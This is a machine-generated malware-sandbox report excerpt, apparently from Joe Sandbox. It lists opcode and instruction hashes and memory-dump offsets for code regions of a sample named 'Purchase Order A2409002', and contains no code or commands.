                                        • API String ID:
                                        • Opcode ID: 25d3554ca67e78dd3d66f907a44efea0a4b8a21808d2935e9394bd9c88a4391a
                                        • Instruction ID: 79dfe7ad1feb2a88c13a9ac611719611a71bc3bbd885ba3fd1ebb6903f9e3edd
                                        • Opcode Fuzzy Hash: 25d3554ca67e78dd3d66f907a44efea0a4b8a21808d2935e9394bd9c88a4391a
                                        • Instruction Fuzzy Hash: D7718FB1F006099FDB54DBA9D94066EB7FAFFC8210F24C669E45AA7344DB30AD02CB51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ae3bf85ad803fa438f6dbad0c4b65913f3b422992bc32add6f8185f5373a88c5
                                        • Instruction ID: fdcdfd891136750880f30f24aa5eccf1b83d0c495c6287645c426f8648e3850d
                                        • Opcode Fuzzy Hash: ae3bf85ad803fa438f6dbad0c4b65913f3b422992bc32add6f8185f5373a88c5
                                        • Instruction Fuzzy Hash: E0912670D09219CFEB90CF65DA84BADBBB2FF49314F2080A9D009E7291DB759984DF81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2324244085.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f80000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c1b9efc360560374b70b9600ef8b910e85b1a7f8b20ecbe0a09db37d115f3f4
                                        • Instruction ID: cd55a8117e2091291b745aae51a90d2aa3d5e9c054a01d1af203eaeb4532e7f8
                                        • Opcode Fuzzy Hash: 2c1b9efc360560374b70b9600ef8b910e85b1a7f8b20ecbe0a09db37d115f3f4
                                        • Instruction Fuzzy Hash: 20617930B002448FCB04EB69C458A7DBBF3AF89750F5584A9E506DB3A1DF759C46CB81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 77891cb5ed92be4e7d042b02663f48064a4b5731fc285cd9f2412f95ced9c6d6
                                        • Instruction ID: 3809e2ae59ca6968be1fdd4d85e086664d7366f8aef98a4fe610424653a25041
                                        • Opcode Fuzzy Hash: 77891cb5ed92be4e7d042b02663f48064a4b5731fc285cd9f2412f95ced9c6d6
                                        • Instruction Fuzzy Hash: 1981F370D09219CFEBA0CF69DA84B9DBBB2FF49314F2080A9D009E7291DB759984DF41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e9352aafb337025434f0a9de5022e0261ed0223071152e95b63e513d869d95d
                                        • Instruction ID: 4aa58ab98cc20e0c31111a91430f662a088c5a231d1e2ac17c06a2dc718b193e
                                        • Opcode Fuzzy Hash: 0e9352aafb337025434f0a9de5022e0261ed0223071152e95b63e513d869d95d
                                        • Instruction Fuzzy Hash: 41811570D0921ACFEB90CF65DA84B99BBB2FF49314F2080A9D009E7251DB759D84DF81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 611478133fdb47c152557b61dcecff022acd4feb96708e8e50353f2a21d6cadf
                                        • Instruction ID: 786735c562b2d5720cd9a617f1ee79caf4d2a475a03a869f927997b417045344
                                        • Opcode Fuzzy Hash: 611478133fdb47c152557b61dcecff022acd4feb96708e8e50353f2a21d6cadf
                                        • Instruction Fuzzy Hash: 87613574B006148FDB44DF68C894AAA7BF6BF89314F2580A9E505DB3B5DB70DC41CBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bc1c2b63b062712dc54662250487733be594379e30a3be3f3f7f70eb1e4d8ce8
                                        • Instruction ID: b9a4552064b6c9e14e38681ff925d3a15bb47f86a7332d6583fbbb6e4b12c84a
                                        • Opcode Fuzzy Hash: bc1c2b63b062712dc54662250487733be594379e30a3be3f3f7f70eb1e4d8ce8
                                        • Instruction Fuzzy Hash: EC710F71D15208EFEF94CF99D884BEEBBF2AF49304F109069D605A7391D3B45A85CBA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8ffe1781f3cb114a9a50e398dad0df779f18aa64aebaf3ee597d01cc807cfc74
                                        • Instruction ID: ac161806694f1160be0a831f8db8388aa4020d6201096914126b43403db60490
                                        • Opcode Fuzzy Hash: 8ffe1781f3cb114a9a50e398dad0df779f18aa64aebaf3ee597d01cc807cfc74
                                        • Instruction Fuzzy Hash: 1E61F071D15208EFEF94CF99D884BEEBBF6AF48304F10A029D605A7350D3B45A85CBA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 87d616d894da36e76baea57bec3105729a28f04c15b0d09197aaf01aed0d76a3
                                        • Instruction ID: c0a3234140cb0d52567cd8b1f33d098a35218c8510ab6c97768f7458938b07ff
                                        • Opcode Fuzzy Hash: 87d616d894da36e76baea57bec3105729a28f04c15b0d09197aaf01aed0d76a3
                                        • Instruction Fuzzy Hash: E36117B4B10614DFCB04DF68D894AADBBBABF89710F108169E906DB365CB71EC41CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6da2da776aab574c7e8d2c74bfa835aa606a8f966cd2aa6b4d065a92a23260c
                                        • Instruction ID: 8f9924e9318acf7e6c2ae731c7a0e24186cea99fc19dea445eb6baeddc9710ec
                                        • Opcode Fuzzy Hash: d6da2da776aab574c7e8d2c74bfa835aa606a8f966cd2aa6b4d065a92a23260c
                                        • Instruction Fuzzy Hash: 4B51E235E006168FCB10DF69C884A6AFBB1FF89720F1985A9D959DB281D730EC52CBD0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 899790d14e51de243abcc15b9eead5aee1fda53b9c78da460a4b30f05f1230ee
                                        • Instruction ID: ac944aa3b7fea4bbf1eee4a3086f500bcb7e9b8daa9f6628cddc09b8f59106d5
                                        • Opcode Fuzzy Hash: 899790d14e51de243abcc15b9eead5aee1fda53b9c78da460a4b30f05f1230ee
                                        • Instruction Fuzzy Hash: 7B71B374E40218CFDB54DFA9D994A9EBBB2FF88300F2091A9E909A7344DB345D85CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2347013021.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7240000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c60b98fbb41415ce55dba4a551d65bbfcbe5fe5c947d059fe6cf04917166ac7b
                                        • Instruction ID: 71353ce741ce294923959d8ce1991efedc2581a55cc70a9dc9beed1ed2007d72
                                        • Opcode Fuzzy Hash: c60b98fbb41415ce55dba4a551d65bbfcbe5fe5c947d059fe6cf04917166ac7b
                                        • Instruction Fuzzy Hash: A361D0B4D2021ACFDB04DFA9E4546AEBBF2FB89310F10852AD855A7344DB746986CF81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c348fd7d683c88700dee4c2d16dfd989d5ee8e80d523660d9db61a307fc476c6
                                        • Instruction ID: 50d82012f7f776dd19c8b22c3f43a1560da3adbbc9158537919457c1a7e12f61
                                        • Opcode Fuzzy Hash: c348fd7d683c88700dee4c2d16dfd989d5ee8e80d523660d9db61a307fc476c6
                                        • Instruction Fuzzy Hash: F751BD31B006108FEF559F29D854BAE7BA2EFC9304F158469E906CB3A1CB74DC06CBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a6ce801a437a1607146f5a478e4eedc3d6a226bb4e4544a85bda8eac4679c46b
                                        • Instruction ID: 2926192745afab35c626a41543552f8c98b93bfb2b22bcbb728982cb43d985ed
                                        • Opcode Fuzzy Hash: a6ce801a437a1607146f5a478e4eedc3d6a226bb4e4544a85bda8eac4679c46b
                                        • Instruction Fuzzy Hash: C8512A76600104AFDB459FA9C914D697BF7FF8D3107168098E2099B372DA36DC22EB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ac2f1aa370823b864d64efd5c011a21229c853b89703b102ff050a6bf645a91
                                        • Instruction ID: 78a645f82cf69f4624b21d420d54c1ead301dee5f919b203a3e71e1657d8d0db
                                        • Opcode Fuzzy Hash: 2ac2f1aa370823b864d64efd5c011a21229c853b89703b102ff050a6bf645a91
                                        • Instruction Fuzzy Hash: 0761C374E402188FDB54DFA9D99469EBBB2FF88300F20D1A9E909A7344DB345D86CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6cb9985bbb9770a233675e90900cb61d4d70f55e21ba23f8bdce247ae3d7c3b7
                                        • Instruction ID: 51eaf81859a57ea663d2ad8983ab7a980ce1d947aab231170fee1d5fb0347a1e
                                        • Opcode Fuzzy Hash: 6cb9985bbb9770a233675e90900cb61d4d70f55e21ba23f8bdce247ae3d7c3b7
                                        • Instruction Fuzzy Hash: 0D515E34B00609DFCB04DF64E498AAEBBB7FF88701F008519E9029B364DF749946DB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e9f64284e4076180292b6a0274b8fec2c4e85f5640501df956c6bef7144be964
                                        • Instruction ID: 5a4a878ed0d0e8009142c0c84f21d392d93150abefc15c8b9408151825144362
                                        • Opcode Fuzzy Hash: e9f64284e4076180292b6a0274b8fec2c4e85f5640501df956c6bef7144be964
                                        • Instruction Fuzzy Hash: C9413570B106188FCB04EB64C894AAEB7BBAFC9710F50461DD507AB394DF749C46DB92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2347013021.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7240000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 51e0b5a0a5a57885c0152f1008529e8f65891440673f0ed04c170a8a63c5272a
                                        • Instruction ID: c3a9cf16a717c93ad61c1582f8058a8c6d93b43d5044adcbca26fc0603d8649b
                                        • Opcode Fuzzy Hash: 51e0b5a0a5a57885c0152f1008529e8f65891440673f0ed04c170a8a63c5272a
                                        • Instruction Fuzzy Hash: 8B513BB4E211099FCB44DFA9D984AADBBF2FB89300F10C069E516A7350DB785D45CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c518e8645324a00f2898e2a6828a7504b55a68686b56eb2c156cea967c15455
                                        • Instruction ID: 22b9e0163e262be1bb2ff894d29928e75f96969661b9e5bdb0e5469468a55012
                                        • Opcode Fuzzy Hash: 0c518e8645324a00f2898e2a6828a7504b55a68686b56eb2c156cea967c15455
                                        • Instruction Fuzzy Hash: 29417B753006109FD7089B69D864F6A7BEAEBC9700F104569F60A8F3A1DA71EC41CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ebac98770f42d23f2ddb5abf5d03af931f7886dc7a51bd3dead9a862733c1250
                                        • Instruction ID: 81c8989449b263200c79583cf134a7c8321d52db51b83d6f21f682648afab9b1
                                        • Opcode Fuzzy Hash: ebac98770f42d23f2ddb5abf5d03af931f7886dc7a51bd3dead9a862733c1250
                                        • Instruction Fuzzy Hash: 8A510274900218CFEF40CF99E488BDDBBF5FF0A304F186159E40AA7286C3789889CB65
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bcb0968638a4d398e6851e38708ff010a1b61f2460677782621b8afade142b51
                                        • Instruction ID: 5d94285cf3a4b3bb5823b5010e524e7aa11376b43c03272904c53115dd7e9c62
                                        • Opcode Fuzzy Hash: bcb0968638a4d398e6851e38708ff010a1b61f2460677782621b8afade142b51
                                        • Instruction Fuzzy Hash: 4B51F570D04218CFEF54CF9AD8487EEBBB6BF49304F189029D419A7255C7745885CFA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ef9540c57ed1e5571803ca3fa6a8dd1a4d5d939a0916cd26cb3cf8f6bef3be85
                                        • Instruction ID: 418b792609c48d0c51dd7cf20bfdff96448dbd1e9a32abf9c42a5fe002717c58
                                        • Opcode Fuzzy Hash: ef9540c57ed1e5571803ca3fa6a8dd1a4d5d939a0916cd26cb3cf8f6bef3be85
                                        • Instruction Fuzzy Hash: 81510470D04218CFEF54CF9AD8886DEBBB6BF8A304F189029D409A7256D7745885CFA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 39005cb751ff6b3f7abe794d618ea9120e6323b2da8dba272e89cd72d9c785bd
                                        • Instruction ID: ac55ad22a4176e4dc9aabf0029461ae4c66490f2fe6fe75fb514427b85d61e99
                                        • Opcode Fuzzy Hash: 39005cb751ff6b3f7abe794d618ea9120e6323b2da8dba272e89cd72d9c785bd
                                        • Instruction Fuzzy Hash: F1511A78A00218CFDBA4DB29CC9079A77B2FF89300F5495E5950AEB354DB34AD85CF52
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e975e470d805a082f0cfe18a23c71820bb6cac100c4a6a5d319008683f9e428e
                                        • Instruction ID: bed129f863f9d9aa37ad6f95f1638a84144dc3e856706aadc002989ec2ccd279
                                        • Opcode Fuzzy Hash: e975e470d805a082f0cfe18a23c71820bb6cac100c4a6a5d319008683f9e428e
                                        • Instruction Fuzzy Hash: D6417AB5A00B059FCB21CF69C944AAEBBF2BF88304F148A5DD58697A90D770F904CF61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d2bc7052716ed9421aa2eba195793e4b793c3edbce5d34cef2859ac9a048204
                                        • Instruction ID: 9504118434748ba0a7f1dbdc183d9a15bea73e5a8f332bce48929205bd657d6a
                                        • Opcode Fuzzy Hash: 4d2bc7052716ed9421aa2eba195793e4b793c3edbce5d34cef2859ac9a048204
                                        • Instruction Fuzzy Hash: F53127B0B00605AFCB249F69D804BAEBBFAEFC5710F104629E556D7380DB70A905CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e30745b69e6653ffe4a5ef9d60769566bb1bbcd661fbeac9bdfdfeecf95acca9
                                        • Instruction ID: 50f8862adf23f07249f052072bf6e2e6b1134efa2651eb045d2b9dd0006b85ce
                                        • Opcode Fuzzy Hash: e30745b69e6653ffe4a5ef9d60769566bb1bbcd661fbeac9bdfdfeecf95acca9
                                        • Instruction Fuzzy Hash: E4412574E15208AFDF40CF99E944BEEBBF6BF88300F20906AE509A7244D7744A45CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2324244085.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f80000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ee38022ad488207324b51b942bd9bac5cf0aea9b4a94e72a6e94831d9f424690
                                        • Instruction ID: 7d7fca6903124be72e2499ad980a81daefc40ca7d7d73d84a6bc8be17ca26ed0
                                        • Opcode Fuzzy Hash: ee38022ad488207324b51b942bd9bac5cf0aea9b4a94e72a6e94831d9f424690
                                        • Instruction Fuzzy Hash: 8B41F630B001049FCB04EB69D498A7DBBF3AF89710F65446DE506AB3A0CF759C858B91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3efe8e132945f182490a6665da2f21ab2276aad211b81c265c31b61b60c38ae7
                                        • Instruction ID: 0b18ea90203acd4e91144a4ff40e52ceb905dd41bfc31ee1e7b93675d4f77e39
                                        • Opcode Fuzzy Hash: 3efe8e132945f182490a6665da2f21ab2276aad211b81c265c31b61b60c38ae7
                                        • Instruction Fuzzy Hash: 7B3157753006109FD348DB69D8A8F6A77EAABC9700F104568E60A8F3A1DF71EC42CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 74f52ddff91de36e3f9e19f4558ba7a168d958bdbd391b050d66d6b022886569
                                        • Instruction ID: 44ab13fa98b31577bd50e6c041ff8dc6bf0f18cb6b3c3dc491c8f31a83879a32
                                        • Opcode Fuzzy Hash: 74f52ddff91de36e3f9e19f4558ba7a168d958bdbd391b050d66d6b022886569
                                        • Instruction Fuzzy Hash: FA410470E11208AFDF44CF99E544BEEB7F6BF88300F209069E609A7240C7745A41CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b3b346e8fb93d0769a05438da85e77c7c809163ea899c274d2a3a4375c6d26f
                                        • Instruction ID: 2fac3f1f371efce931a88a0b9fdc92ca0ed092b0a2c2f77453570c0e3212abed
                                        • Opcode Fuzzy Hash: 2b3b346e8fb93d0769a05438da85e77c7c809163ea899c274d2a3a4375c6d26f
                                        • Instruction Fuzzy Hash: A241EF74940218CFEF40CF99D488BDDBBB5FF4A304F185159E40AAB286C3389889CFA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56edba52fe13593d75e7a37215bdc00ee1bc09c19262432afb2338a4329fbecf
                                        • Instruction ID: 76caa3727e6e4ad878854f260482df4866842b65a9102b38579e7e06eef2b2ea
                                        • Opcode Fuzzy Hash: 56edba52fe13593d75e7a37215bdc00ee1bc09c19262432afb2338a4329fbecf
                                        • Instruction Fuzzy Hash: BB41EF74940218CFEF40CF99D488BDDB7B5FF4A304F185159E40AAB286C3389885CFA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bc8cdabe778a97bd8dd70900602dd5ee2ed9df35e5aa230e1afb61dd7307702d
                                        • Instruction ID: d540e0b05b1bcba22462ae295919d288266c65f7927eb700aed854e1205898c0
                                        • Opcode Fuzzy Hash: bc8cdabe778a97bd8dd70900602dd5ee2ed9df35e5aa230e1afb61dd7307702d
                                        • Instruction Fuzzy Hash: 13311676A101059FCB44CF68E898E99BBB6FF48320F1640A8E9099B372C731EC51DB40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c5526137d5a63c3c6838790790d641ad72127e938926262837445cdab6300754
                                        • Instruction ID: 778b0c0371a33eafbc56c18e89e6c01b3be5121c625722508c660410084056f1
                                        • Opcode Fuzzy Hash: c5526137d5a63c3c6838790790d641ad72127e938926262837445cdab6300754
                                        • Instruction Fuzzy Hash: 84415A71E0021A8FDB54CFA5CA456AEBBF1FF88320F108479D915E72A0D774D945CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6da7657beb05e427c1cc625b97ed1e33a18dbfa16d8b0c88ff952185500104b
                                        • Instruction ID: 88ae7bfdb1d68d2cf6d9eb16c961a5bbe225a905b28e3c8845dc1ee54a88e022
                                        • Opcode Fuzzy Hash: e6da7657beb05e427c1cc625b97ed1e33a18dbfa16d8b0c88ff952185500104b
                                        • Instruction Fuzzy Hash: 8D411670944218CFEF50CFA9D488BDDB7F5FF4A304F185159D009A7246C3385885CB65
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 18beecaa625b4a7603d2853824650cd7acc81613339601598cf070a309d3937a
                                        • Instruction ID: 4ea3486e21a7012286dbd3dc038604c00c7c90a2b465fdd72310e1261f6665ae
                                        • Opcode Fuzzy Hash: 18beecaa625b4a7603d2853824650cd7acc81613339601598cf070a309d3937a
                                        • Instruction Fuzzy Hash: AA41AE74944218CFEF50CF99D888BDDBBB5FF4A304F185119E40AAB295C3789885CFA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c919bbdf7632dce4828abad78e5d4e4d756bb0c0707b2812aea259cef3efd633
                                        • Instruction ID: e449204f9ccc97a7f743d20f947bc41d3acf0fec4874ea06b8d8fcf24a398657
                                        • Opcode Fuzzy Hash: c919bbdf7632dce4828abad78e5d4e4d756bb0c0707b2812aea259cef3efd633
                                        • Instruction Fuzzy Hash: 6A41C674E112289FEB64DB14CD90F99B7B2BF49320F1041E9E909AB391D631AD81CF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 842922de2e5f7269c2fd4e9af464565bf9ecbbccb0f6fd3af93ba90934f06bd2
                                        • Instruction ID: 87077332d6d4fe0d51d8235f7326dc31db215729db8d08e84901e6349186ff01
                                        • Opcode Fuzzy Hash: 842922de2e5f7269c2fd4e9af464565bf9ecbbccb0f6fd3af93ba90934f06bd2
